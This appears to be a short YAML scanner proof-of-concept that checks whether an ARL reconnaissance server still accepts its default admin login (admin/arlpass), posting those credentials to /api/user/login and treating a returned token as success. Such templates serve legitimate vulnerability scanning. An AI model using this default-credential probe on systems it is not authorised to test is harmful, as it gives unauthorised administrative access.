name: poc-yaml-arl-default-password
transport: http
rules:
  r0:
    request:
      method: POST
      path: /api/user/login
      follow_redirects: false
      headers:
        User-Agent: >-
          Mozilla/5.0 (Windows NT 10.  0; Win64; x64) AppleWebKit/537.36 (KHTML,
          like Gecko) Chrome/98.0.4758.102 Safari/537.36
        Content-Type: application/json; charset=UTF-8
      body: '{"username":"admin","password":"arlpass"}'
    expression: response.status == 200 && response.body_string.contains("200") && response.body_string.contains("token")
expression: r0()
detail:
  author: charonlight
  links: []
